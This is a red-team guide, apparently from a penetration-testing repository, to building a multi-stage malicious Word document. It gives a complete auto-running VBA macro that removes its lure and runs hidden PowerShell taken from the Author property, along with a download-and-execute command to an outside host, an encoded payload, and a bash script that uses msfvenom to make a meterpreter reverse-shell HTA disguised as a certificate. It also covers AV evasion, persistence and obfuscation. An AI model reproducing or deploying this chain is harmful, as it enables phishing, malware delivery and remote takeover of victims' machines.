mgeeky-Penetration-Testing-.../red-teaming/muti-stage-1.md

219 lines
8.0 KiB
Markdown
Raw Permalink Normal View History

2018-02-02 22:22:43 +01:00
# Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process
The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.
The resulted document will be:
- using OLE event autorun method
- removing it's pretext shapes
- Obtaining commands to be executed from document's _Author_ property and passing them to `StdIn` of _Powershell.exe_ process
- Leveraging `certutil` technique to receive Base64 encoded malicious HTA document
- Having Base64 encoded Powershell command in that _Author_ property
- Having fully Obfuscated VBA macro
---
1. Create an empty Word document with extension `.doc`
---
2. Create an OLE object named `Microsoft InkPicture Control` (_Developer tab -> Insert -> More controls -> ... _)
---
3. Double click on that OLE object and add the following method:
```
Public Once As Integer
Public Sub Launch()
On Error Resume Next
'
' Here will be malicious code placed
'
End Sub
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
If Once < 1 Then
Launch
End If
Once = Once + 1
End Sub
```
Since the `Painted` event will be triggered several times, we want to avoid situation of having several stagers popped on the target machine.
---
4. Then, add pretext shape enticing victim to enable editing/macros - having that, insert a function that will delete this shape after victim really enable macros.
For example of such shape - you can refer to one of my [repos](https://github.com/mgeeky/RobustPentestMacro).
**NOTICE**: Make sure to put the OLE Control in the topmost left corner of the document and to color that control (right click -> Propertied -> Color) so it will overlap visually with Pretext-shape.
The trick is to make the victim move the mouse over that OLE control after enabling macros (making it trigger `Painted` event in the background).
The function that will delete this and OLE object shapes after enabling macros is placed below:
```
Public Sub Launch()
On Error Resume Next
DeleteWarningShape "warning-div", True
DeleteWarningShape "Control 2", True
...
End Sub
Private Sub DeleteWarningShape(ByVal textBoxName As String, ByVal saveDocAfter As Boolean)
Dim shape As Word.shape
On Error Resume Next
For Each shape In ActiveDocument.Shapes
If StrComp(shape.Name, textBoxName) = 0 Then
shape.Delete
Exit For
End If
Next
If saveDocAfter Then
ActiveDocument.Save
End If
End Sub
```
---
5. Now, add code obtaining malicious _Powershell_ commands from _Author_ document's property and passing it to the _Powershell's_ `StdIn` stream:
```
Public Sub Launch()
On Error Resume Next
DeleteWarningShape "warning-div", True
DeleteWarningShape "Control 2", True
Dim authorProperty As String
authorProperty = ActiveDocument.BuiltInDocumentProperties("Author")
Set objWShell = CreateObject("WScr" & "ipt.S" & "hell")
With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -")
.StdIn.WriteLine authorProperty
.StdIn.WriteBlankLine 1
.Terminate
End With
```
Of course, having that - you will have to remember to add proper Powershell command to be executed right into _Author_ property of the Word file.
---
6. Now, we have to insert some code into that _Author_ property. This code should do the following:
- Download Base64 encoded `encoded.crt` file containing malicious HTA code.
- Use `certutil -decode encoded.crt out.hta` command that will strip that Base64 layer.
- Make entire powershell code that shall be placed in _Author_ property Unicode-Base64 encoded in such a way, that Powershell's `-EncodedCommand` will be able to process.
The following code can be use as an example:
```
powershell -ep bypass -Command "(new-object Net.WebClient).DownloadFile('http://192.168.56.101/encoded.crt','%TEMP%\encoded.crt');certutil -decode %TEMP%\encoded.crt %TEMP%\encoded.hta;start %TEMP%\encoded.hta"
```
Here, the file will be obtained from `http://192.168.56.101/encoded.crt` - of course, one will want to move that file into HTTPS webserver having some luring domain name.
This command can be then converted into Powershell-supported Base64 payload like so:
```
C:\Users\IEUser\Desktop\files\dl>powershell -ep bypass -command "[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(\"(new-object Net.WebClient).DownloadFile('http://192.168.56.101/encoded.crt','%TEMP%\encoded.crt');certutil -decode %TEMP%\encoded.crt %TEMP%\encoded.hta;start %TEMP%\encoded.hta\"))"
KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADUANgAuADEAMAAxAC8AZQBuAGMAbwBkAGUAZAAuAGMAcgB0ACcALAAnAEMAOgBcAFUAcwBlAHIAcwBcAEkARQBVAHMAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABlAG4AYwBvAGQAZQBkAC4AYwByAHQAJwApADsAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAEkARQBVAHMAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABlAG4AYwBvAGQAZQBkAC4AYwByAHQAIABDADoAXABVAHMAZQByAHMAXABJAEUAVQBzAGUAcgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAZQBuAGMAbwBkAGUAZAAuAGgAdABhADsAcwB0AGEAcgB0ACAAQwA6AFwAVQBzAGUAcgBzAFwASQBFAFUAcwBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGUAbgBjAG8AZABlAGQALgBoAHQAYQA=
```
Now this code is to be placed into _Author_ property.
---
7. Now, in order to generate that `encoded.crt` file - go for the following steps:
- Step 1: Using `msfvenom` generate malicious HTA file
- Step 2: Convert that payload into Base64-encoded certificate file.
In order to automate above steps - you can use the below script:
```
#!/bin/bash
# --- PAYLOAD SETUP
LHOST=192.168.56.101
LPORT=4444
PAYLOAD=windows/meterpreter/reverse_tcp
# This file must have *.crt extension
OUTPUT_FILE=/var/www/html/encoded.crt
PAYLOAD_FILE=/tmp/test$RANDOM
# ----
msfvenom -f hta-psh -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -o $PAYLOAD_FILE
echo -----BEGIN CERTIFICATE----- > $OUTPUT_FILE
cat $PAYLOAD_FILE | base64 -w 0 >> $OUTPUT_FILE
echo -----END CERTIFICATE----- >> $OUTPUT_FILE
chown www-data:www-data $OUTPUT_FILE 2> /dev/null
echo "Generated file: $OUTPUT_FILE"
```
And Voila! You will have your `encoded.crt` file in webroot.
---
8. After that you can add some persistence methods and further fail-proof the Macro code. For a nice example of persistence method - the `WMIPersistence` method can be used:
[WMIPersistence](https://gist.github.com/mgeeky/d00ba855d2af73fd8d7446df0f64c25a)
---
9. After that, you will want to make the entire VBA macro code become obfuscated to further slow down analysis process.
The obfuscation can easily be pulled off using my [VisualBasicObfuscator](https://github.com/mgeeky/VisualBasicObfuscator)
---
## ENTIRE MACRO CAN LOOK LIKE THIS:
(without persistence method)
```
Public Once As Integer
Public Sub Launch()
On Error Resume Next
DeleteWarningShape "warning-div", False
DeleteWarningShape "Control 2", False
Dim authorProperty As String
authorProperty = ActiveDocument.BuiltInDocumentProperties("Author")
Set objWShell = CreateObject("WScr" & "ipt.S" & "hell")
With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -")
.StdIn.WriteLine authorProperty
.StdIn.WriteBlankLine 1
.Terminate
End With
End Sub
Private Sub DeleteWarningShape(ByVal textBoxName As String, ByVal saveDocAfter As Boolean)
Dim shape As Word.shape
On Error Resume Next
For Each shape In ActiveDocument.Shapes
If StrComp(shape.Name, textBoxName) = 0 Then
shape.Delete
Exit For
End If
Next
If saveDocAfter Then
ActiveDocument.Save
End If
End Sub
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
If Once < 1 Then
Launch
End If
Once = Once + 1
End Sub
```